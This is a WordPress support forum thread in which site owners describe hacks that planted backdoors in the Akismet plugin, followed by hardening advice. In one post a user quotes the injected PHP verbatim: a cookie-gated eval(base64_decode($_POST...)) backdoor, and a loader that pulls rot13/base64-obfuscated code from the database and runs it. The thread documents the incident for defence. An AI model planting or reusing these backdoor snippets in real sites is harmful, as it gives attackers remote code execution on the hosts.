Forums

WordPress › Support » How-To and Troubleshooting

[resolved] Site hacked through Akismet (20 posts)

  1. Bratuh Alexander
    Member
    Posted 10 months ago #

    09-07-2011 hack script were flooded in the directory: /home/***/ public_html/wp-content/plugins/akismet. Hacking has been made with the help of this script below:
    http://***.com/wp-content/plugins/akismet/akismet.php

    Responsibility for breaking assumed "HacKeD By RKH Team"

    The script was filled using one of the holes in the code already installed plugins, as malefactors have cleared the logs to access account, so that they could calculate the log files at the physical server.

    wordpress 3.2 (fresh)

  2. xxxxbyte
    Member
    Posted 10 months ago #

    Yeah, the "RKH Team" seems to have an exploit that affects WP.

  3. Bratuh Alexander
    Member
    Posted 10 months ago #

    This is so clear. Pay attention to the fact of using akismet (in this module was not activated) to crack. Wen, this module is installed by default. Therefore, it is a global problem.

  4. Joseph Scott
    Member
    Posted 10 months ago #

    Alexander -

    Please send details to security@wordpress.org

  5. mrtorrent
    Member
    Posted 10 months ago #

    Here's a copy of the e-mail I sent to security@wordpress, in case it helps anyone diagnose their own issues:

    Hi folks, my WordPress install was recently hacked (see here for initial symptoms and another victim: http://wordpress.org/support/topic/wp-super-cache-has-broken-my-site-i-need-help-please?replies=4) and based on what I'm seeing in the logs it might be Akismet-related (maybe connected to http://wordpress.org/support/topic/site-hacked-through-akismet?replies=4?). My WordPress core is 3.1.3; Akismet and my other plugins are up-to-date as of a week or so ago.

    On 3 July, the address 217.23.3.57 made about 15 POSTs to wp-login.php, followed by a number of different GET requests to wp-admin/templates.php. The templates.php requests returned 404s, but they then got a 200 for wp-admin/plugin-editor.php and sent the parameters file=akismet/akismet.php&plugin=akismet/akismet.php.

    They then sent a POST to plugin-editor.php, I believe to inject the following code into akismet.php:
    if(md5($_COOKIE['1258f0ce88b068e6'])=="948467a3e2a78f5fb4b4ea8934416ca9"){ eval(base64_decode($_POST['file'])); exit; }

    There then followed another successful POST directly to wp-content/plugins/akismet/akismet.php, presumably to execute the above code.

    While the above code only appears in akismet.php, all plugin files have now been injected with some bootstrap code that loads up a bunch of base64-encoded and obfuscated code from the database:
    $z=get_option("_transient_feed_1f198b76a8c316731dd24df4a7f4fd3e"); $z=base64_decode(str_rot13($z)); if(strpos($z,"8F8995B6")!==false){ $_z=create_function("",$z); @$_z(); }

    Some of the code chmods everything in the theme and plugin directories to 0777, changes the modification times of all WordPress files to Sep 5 2007, and disables and removes the error logs.

    I think that at this point the attackers tripped themselves up, however, because the bootstrap code was injected into wp-cache-phase1.php from the Super Cache plugin. It seems that get_option is not defined yet when that code is executed, so WordPress started returning 500s and the attacker seems to have given up.

    I haven't been able to determine yet how they gained access in the first place, but I'm happy to supply access logs, compromised files, etc. if you're interested.

    Best regards,
    Miquel

  6. Mark (podz)
    Support Maven
    Posted 10 months ago #

    "but they then got a 200 for wp-admin/plugin-editor.php"

    So that looks like the file. If that file had not been compromised first then no other damage could have happened surely?

  7. Chip Bennett
    Member
    Posted 10 months ago #

    These kinds of reports should go first and only to security@wordpress.org. P

    osting exploit details here won't get the information into the right hands, and can only serve to facilitate public disclosure of the exploit, potentially allowing others to make use of it.

  8. mrtorrent
    Member
    Posted 10 months ago #

    @Mark: I don't know, I can't tell if they succeeded in logging in via wp-login or not.

    @Chip: As I said, I have contacted security@wordpress. What I posted here are only the symptoms of an attack, the damage done. None of this information is really of any use to anyone looking for a vulnerability, only to people who might be seeing similar symptoms and wondering what happened. Moderators are free to delete or censor it if they feel otherwise.

  9. Bratuh Alexander
    Member
    Posted 10 months ago #

    Chip Bennett, Joseph Scott, thank you for your attention to the problem.

    Now I've found that another site is hacked. Hacking is made of the same commands. General features: domains *.com, version wp3.2, last updated Akismet (to hack the plugin was disabled, was activated after the hack). When hacking, hacker has full access to the file system and, consequently, to the database. Logs removed.

    At the moment, I examined the logs of the server. For details send an e-mail security@wordpress.org.

    Previously done next action to prevent re-cracking: restore the backup sites, replacing all the passwords (account management, FTP, mysql, etc), removed all plugin Akismet.

  10. Joseph Scott
    Member
    Posted 10 months ago #

    I suspect what is happening (based on what has happened to others) is that someone breaks into the site via some other method, then injects backdoor code into plugins. The Akismet plugin is a common target for this because it ships with WordPress. So far from what I've been able to see and information gathered they aren't actually breaking in using Akismet, just using it as a convenient place to inject their backdoor code.

  11. Bratuh Alexander
    Member
    Posted 10 months ago #

    Joseph Scott: All true. And the big problem is that Akismet is supplied by default with the system. Even if he is not active, it rarely removes. Technical details of plan to send you e-mail.

  12. Joseph Scott
    Member
    Posted 10 months ago #

    Unfortunately if they are still able to break in they'll just inject the code into a different file.

  13. Ipstenu
    Half-Elf Support Rogue & Mod
    Posted 10 months ago #

    As Joseph said. It doesn't matter WHAT the included whatever is. They could have picked ANY file. WordPress's code is 100% GPL and open to the public. It's not that Akismet was hacked, it's that your SERVER was hacked and Akismet was the target. It's like ... Someone broke in your window. Everyone has windows. That doesn't mean the window is insecure, though it may be, it means your window was a target.

    But you can lock your window ;) I would strongly suggest locking down permissions on the wp-content folder. If it's 777, lock it down. You may have to give up the ability to autoupdate, but IMO it would be worth it.

    The files in the repo are fine (I did just go look AND I downloaded a fresh copy).

    This is, I am certain, a server issue.

  14. mrtorrent
    Member
    Posted 10 months ago #

    For those interested, in my case the situation appears to be as Joseph has explained -- the attacker broke in and then injected some code into akismet to give himself further capabilities. In my look through the logs I'd missed the fact that the final POST to wp-login received a 302 (redirect) response, which seems to indicate a successful login. There was an unexpected user account in my WordPress database, but it's probable that this was added afterwards rather than beforehand -- otherwise they would have logged in on the first try. Since it only took them 15 attempts, I guess they either got lucky or they first compromised this password on another site -- it was an old, simple one that I'd never gotten around to changing.

    A big thank-you to the WordPress security guys (particularly Otto) for helping me get to the bottom of this and being so helpful.

  15. Chip Bennett
    Member
    Posted 10 months ago #

    I'm sure Otto probably suggested this to you, but I would strongly recommend using a Plugin such as Limit Login Attempts or Login Lockdown, to prevent brute-force password attacks. (I prefer Limit Login Attempts, because it provides email notification.)

  16. mrtorrent
    Member
    Posted 10 months ago #

    @Chip Thanks very much, I'll check those out. Unfortunately I hadn't realised before this that WordPress didn't limit login attempts out of the box -- it's pretty basic good practice for discouraging brute force attacks so I'll certainly be installing one of those plugins.

  17. Chip Bennett
    Member
    Posted 10 months ago #

    Also, if you must keep the "admin" username, I would recommend adding another account to the Administrator role, and changing "admin" to Subscriber. That way, even if someone brute-forces, phishes, or otherwise acquires the "admin" username password, use of that account will be sandboxed.

  18. archaicertes
    Member
    Posted 4 months ago #

    I've seen this one happen a few times now. When I look at the logs, it looks like they just log in (no new user), and go to the plugin editor and add their code. What are the common ways that they get the password? I already changed it once for a client and removed the 'admin' user.

  19. esmi
    Theme Diva & Forum Moderator
    Posted 4 months ago #

    Many hackers are now entering via FTP have gained access to the login credentials via unencrypted FTP transfers. So ensure that you use SFTP or encrypted FTP at all times.

  20. luminancedesign
    Member
    Posted 3 months ago #

    I've just received notification via email from my WordPress Firewall plugin stating that it has detected and blocked a potential attack which seems to target the Akismet plugin - may be worth installing this plugin, particularly if it's going to catch attacks like this [as it has done with my site]!

Reply

You must log in to post.

About this Topic

Tags